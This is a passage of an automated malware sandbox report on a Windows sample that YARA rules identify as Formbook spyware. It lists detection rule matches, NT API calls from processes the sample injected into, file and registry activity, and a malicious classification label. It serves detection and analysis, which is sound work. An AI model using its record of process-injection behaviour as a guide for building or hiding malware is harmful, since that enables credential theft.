          Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889780 NtMapViewOfSection,LdrInitializeThunk,2_2_03889780
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_038897A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_038897A0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889710 NtQueryInformationToken,LdrInitializeThunk,2_2_03889710
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_038896E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_038896E0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_03889A00
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889A20 NtResumeThread,LdrInitializeThunk,2_2_03889A20
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889A50 NtCreateFile,LdrInitializeThunk,2_2_03889A50
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_03889660
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_038899A0 NtCreateSection,LdrInitializeThunk,2_2_038899A0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_038895D0 NtClose,LdrInitializeThunk,2_2_038895D0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_03889910
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889540 NtReadFile,LdrInitializeThunk,2_2_03889540
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_038898F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_038898F0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889840 NtDelayExecution,LdrInitializeThunk,2_2_03889840
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889860 NtQuerySystemInformation,LdrInitializeThunk,2_2_03889860
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_0388A3B0 NtGetContextThread,2_2_0388A3B0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889FE0 NtCreateMutant,2_2_03889FE0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889B00 NtSetValueKey,2_2_03889B00
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_0388A710 NtOpenProcessToken,2_2_0388A710
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889730 NtQueryVirtualMemory,2_2_03889730
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889760 NtOpenProcess,2_2_03889760
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889770 NtSetInformationFile,2_2_03889770
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_0388A770 NtOpenThread,2_2_0388A770
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889A80 NtOpenDirectoryObject,2_2_03889A80
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_038896D0 NtCreateKey,2_2_038896D0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889610 NtEnumerateValueKey,2_2_03889610
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889A10 NtQuerySection,2_2_03889A10
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889650 NtQueryValueKey,2_2_03889650
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889670 NtQueryInformationProcess,2_2_03889670
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_038899D0 NtCreateProcessEx,2_2_038899D0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_038895F0 NtQueryInformationFile,2_2_038895F0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889520 NtWaitForSingleObject,2_2_03889520
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_0388AD30 NtSetContextThread,2_2_0388AD30
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889950 NtQueueApcThread,2_2_03889950
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889560 NtWriteFile,2_2_03889560
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_038898A0 NtWriteVirtualMemory,2_2_038898A0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03889820 NtEnumerateKey,2_2_03889820
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_0388B040 NtSuspendThread,2_2_0388B040
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_10429850 NtCreateFile,2_2_10429850
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_10429900 NtReadFile,2_2_10429900
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_10429980 NtClose,2_2_10429980
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_10429A30 NtAllocateVirtualMemory,2_2_10429A30
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_1042984A NtCreateFile,2_2_1042984A
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_104298FB NtReadFile,2_2_104298FB
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_1042997A NtClose,2_2_1042997A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9860 NtQuerySystemInformation,LdrInitializeThunk,10_2_00BC9860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9840 NtDelayExecution,LdrInitializeThunk,10_2_00BC9840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC99A0 NtCreateSection,LdrInitializeThunk,10_2_00BC99A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_00BC9910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9A50 NtCreateFile,LdrInitializeThunk,10_2_00BC9A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9B00 NtSetValueKey,LdrInitializeThunk,10_2_00BC9B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC95D0 NtClose,LdrInitializeThunk,10_2_00BC95D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9560 NtWriteFile,LdrInitializeThunk,10_2_00BC9560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9540 NtReadFile,LdrInitializeThunk,10_2_00BC9540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC96E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_00BC96E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC96D0 NtCreateKey,LdrInitializeThunk,10_2_00BC96D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9780 NtMapViewOfSection,LdrInitializeThunk,10_2_00BC9780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9FE0 NtCreateMutant,LdrInitializeThunk,10_2_00BC9FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9710 NtQueryInformationToken,LdrInitializeThunk,10_2_00BC9710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9770 NtSetInformationFile,LdrInitializeThunk,10_2_00BC9770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC98A0 NtWriteVirtualMemory,10_2_00BC98A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC98F0 NtReadVirtualMemory,10_2_00BC98F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9820 NtEnumerateKey,10_2_00BC9820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BCB040 NtSuspendThread,10_2_00BCB040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC99D0 NtCreateProcessEx,10_2_00BC99D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9950 NtQueueApcThread,10_2_00BC9950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9A80 NtOpenDirectoryObject,10_2_00BC9A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9A20 NtResumeThread,10_2_00BC9A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9A10 NtQuerySection,10_2_00BC9A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9A00 NtProtectVirtualMemory,10_2_00BC9A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BCA3B0 NtGetContextThread,10_2_00BCA3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC95F0 NtQueryInformationFile,10_2_00BC95F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BCAD30 NtSetContextThread,10_2_00BCAD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9520 NtWaitForSingleObject,10_2_00BC9520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9610 NtEnumerateValueKey,10_2_00BC9610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9670 NtQueryInformationProcess,10_2_00BC9670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9660 NtAllocateVirtualMemory,10_2_00BC9660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9650 NtQueryValueKey,10_2_00BC9650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC97A0 NtUnmapViewOfSection,10_2_00BC97A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9730 NtQueryVirtualMemory,10_2_00BC9730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BCA710 NtOpenProcessToken,10_2_00BCA710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BCA770 NtOpenThread,10_2_00BCA770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BC9760 NtOpenProcess,10_2_00BC9760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00169850 NtCreateFile,10_2_00169850
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00169900 NtReadFile,10_2_00169900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00169980 NtClose,10_2_00169980
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0016984A NtCreateFile,10_2_0016984A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_001698FB NtReadFile,10_2_001698FB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0016997A NtClose,10_2_0016997A
          Source: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exeCode function: 21_2_00F1146F RtlInitUnicodeString,NtOpenEvent,NtCreateEvent,NtOpenEvent,WaitForSingleObject,NtClose,NetJoinDomain,21_2_00F1146F
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_0387EBB02_2_0387EBB0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03866E302_2_03866E30
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_038725812_2_03872581
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_0385D5E02_2_0385D5E0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_0384F9002_2_0384F900
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03840D202_2_03840D20
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_038641202_2_03864120
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_03911D552_2_03911D55
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_0385B0902_2_0385B090
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_038720A02_2_038720A0
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_039010022_2_03901002
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_0385841F2_2_0385841F
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_104110302_2_10411030
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_1042CA462_2_1042CA46
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_1042DA5E2_2_1042DA5E
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_1042D29D2_2_1042D29D
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_1042CB3E2_2_1042CB3E
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_1042D4B32_2_1042D4B3
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_10412D902_2_10412D90
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_1042DFE62_2_1042DFE6
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_1042D7F92_2_1042D7F9
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_10419F802_2_10419F80
          Source: C:\Windows\SysWOW64\secinit.exeCode function: 2_2_10412FB02_2_10412FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BB20A010_2_00BB20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00B9B09010_2_00B9B090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00C528EC10_2_00C528EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00C520A810_2_00C520A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00C4100210_2_00C41002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BA412010_2_00BA4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00B8F90010_2_00B8F900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00C522AE10_2_00C522AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BBEBB010_2_00BBEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00C4DBD210_2_00C4DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00C52B2810_2_00C52B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00C4D46610_2_00C4D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00B9841F10_2_00B9841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00C525DD10_2_00C525DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BB258110_2_00BB2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00B9D5E010_2_00B9D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00C51D5510_2_00C51D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00B80D2010_2_00B80D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00C52D0710_2_00C52D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00C52EF710_2_00C52EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00BA6E3010_2_00BA6E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00C4D61610_2_00C4D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00C51FF110_2_00C51FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0016DA5E10_2_0016DA5E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0016CA4610_2_0016CA46
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0016D4B310_2_0016D4B3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00152D9010_2_00152D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00159F8010_2_00159F80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_00152FB010_2_00152FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0016D7F910_2_0016D7F9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0016DFE610_2_0016DFE6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 00B8B150 appears 35 times
          Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 0384B150 appears 32 times
          Source: f97e137e_by_Libranalysis.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/9@6/2
          Source: C:\Windows\explorer.exeFile created: C:\Program Files (x86)\AdrldefcpJump to behavior
          Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUUJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4388:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_01
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\AdrldefcpJump to behavior
          Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior